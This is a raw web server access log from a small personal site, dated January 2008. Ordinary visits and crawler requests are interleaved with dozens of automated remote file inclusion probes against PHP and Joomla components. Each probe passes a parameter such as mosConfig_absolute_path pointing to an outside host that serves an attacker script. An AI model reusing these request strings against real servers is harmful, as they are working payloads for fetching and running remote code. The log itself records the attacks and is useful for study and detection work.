194.72.9.24 - - [16/Jan/2008:15:32:15 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:32:16 -0800] "GET /logs/access_071224.log HTTP/1.1" 200 205925 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:32:19 -0800] "GET /logs/?N=D HTTP/1.1" 200 30396 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:32:22 -0800] "GET /minamijewelry/source_images/?A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
194.72.9.24 - - [16/Jan/2008:15:32:48 -0800] "GET /logs/access_070822.log HTTP/1.1" 200 49732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:15:32:57 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:33:10 -0800] "GET /retreat1/webcam/?D=D HTTP/1.1" 200 523934 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
62.50.14.189 - - [16/Jan/2008:15:33:32 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.34 - - [16/Jan/2008:15:34:39 -0800] "GET /tmp/?S=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:15:35:56 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.92.167.50 - - [16/Jan/2008:15:41:13 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:15:43:17 -0800] "GET /logs/access_080101.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:15:43:18 -0800] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:15:43:18 -0800] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:45:45 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:45:48 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:45:54 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:46:12 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.50.14.189 - - [16/Jan/2008:15:48:08 -0800] "GET /logs/access_071220.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:49:20 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:49:29 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:15:49:32 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.72.59.98 - - [16/Jan/2008:15:50:54 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
75.72.59.98 - - [16/Jan/2008:15:50:54 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
62.50.14.189 - - [16/Jan/2008:15:51:18 -0800] "GET /logs/access_071220.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:15:51:45 -0800] "GET /logs/access.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:15:57:06 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:15:58:01 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:15:58:01 -0800] "GET /config.php?path_to_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:15:58:01 -0800] "GET /logs/config.php?path_to_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:15:59:26 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.74.238 - - [16/Jan/2008:16:01:56 -0800] "GET /index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.194.74.238 - - [16/Jan/2008:16:01:56 -0800] "GET /logs/index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:16:03:50 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:16:04:07 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:16:04:08 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:16:04:09 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.87.131.98 - - [16/Jan/2008:16:04:41 -0800] "GET /protection.php?action=logout&siteurl=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
80.87.131.98 - - [16/Jan/2008:16:04:41 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.6.24.145 - - [16/Jan/2008:16:05:54 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:07:25 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:07:25 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:09:06 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:09:06 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
71.136.51.92 - - [16/Jan/2008:16:14:59 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=368440#post368440" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:16:19:15 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.18.131 - - [16/Jan/2008:16:22:42 -0800] "GET /newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:16:27:52 -0800] "GET /logs/access_071230.log HTTP/1.1" 200 231687 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:16:29:32 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:16:29:35 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:16:29:38 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.75.218 - - [16/Jan/2008:16:29:44 -0800] "GET /module_db.php?pivot_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.115 - - [16/Jan/2008:16:31:45 -0800] "GET /logs/access_070914.log HTTP/1.0" 200 86919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:16:32:25 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:16:32:37 -0800] "GET /logs/access_071225.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:16:32:38 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.192 - - [16/Jan/2008:16:32:38 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:33:24 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:33:24 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:33:32 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:33:32 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.25.30 - - [16/Jan/2008:16:37:13 -0800] "GET /logs/access_071202.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.120.136.110 - - [16/Jan/2008:16:37:15 -0800] "HEAD /minamijewelry/html/contact.html HTTP/1.0" 200 0 "http://www.dmulk.com" "Opera/9.23 (Windows NT 5.1; U; en)" "www.dmulk.com"
66.120.136.110 - - [16/Jan/2008:16:37:17 -0800] "GET /minamijewelry/html/contact.html HTTP/1.0" 200 12370 "http://www.dmulk.com" "Opera/9.23 (Windows NT 5.1; U; en)" "www.dmulk.com"
216.32.75.218 - - [16/Jan/2008:16:37:21 -0800] "GET /logs/access_071231.log/module_db.php?pivot_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.75.218 - - [16/Jan/2008:16:37:21 -0800] "GET /logs/module_db.php?pivot_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:38:59 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:16:38:59 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
80.87.131.98 - - [16/Jan/2008:16:40:10 -0800] "GET /index.php?option=com_page_cache&Itemid=&mosConfig_absolute_path=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
80.87.131.98 - - [16/Jan/2008:16:40:11 -0800] "GET /logs/index.php?option=com_page_cache&Itemid=&mosConfig_absolute_path=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:16:40:39 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:16:40:39 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [16/Jan/2008:16:40:39 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:16:43:10 -0800] "GET /logs/access_071205.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:16:43:11 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:16:43:11 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://membres.lycos.fr/thektools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:47:52 -0800] "GET /warboard/index.php?function=show_insert_form&table_name=warboard_main HTTP/1.1" 200 7348 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:49:17 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=insert HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:49:17 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc HTTP/1.1" 200 33102 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:50:14 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=580 HTTP/1.1" 200 7603 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:50:27 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=580 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=580" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:50:27 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=580&just_updated=1 HTTP/1.1" 200 7657 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=580" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:50:30 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=580&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:50:33 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:50:34 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33132 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:51:04 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 33014 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [16/Jan/2008:16:51:16 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33132 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:16:52:59 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mxn.diinoweb.com/files/script/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:16:52:59 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mxn.diinoweb.com/files/script/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:16:52:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mxn.diinoweb.com/files/script/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.80.193.35 - - [16/Jan/2008:16:53:45 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc5; i686 Linux; 20020824)" "www.dmulk.com"
72.30.216.109 - - [16/Jan/2008:16:55:03 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.20.244.199 - - [16/Jan/2008:17:05:27 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.20.244.199 - - [16/Jan/2008:17:05:27 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.20.244.199 - - [16/Jan/2008:17:05:27 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:07:43 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:07:43 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [16/Jan/2008:17:07:44 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://59.105.213.128/appserv/ascid.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.62.22.66 - - [16/Jan/2008:17:09:58 -0800] "GET /logs/access_070809.log HTTP/1.1" 200 38136 "http://search.yahoo.com/search?p=@yahoo.co.kw++++++@yahoo.co.in++++++@yahoo.co.sa++++++txt&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Crazy Browser 1.0.5)" "www.dmulk.com"
195.114.18.131 - - [16/Jan/2008:17:10:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://navajosquare.com/components/com_simpleboard/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.179.126.38 - - [16/Jan/2008:17:10:49 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.falmeriafs.com//components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
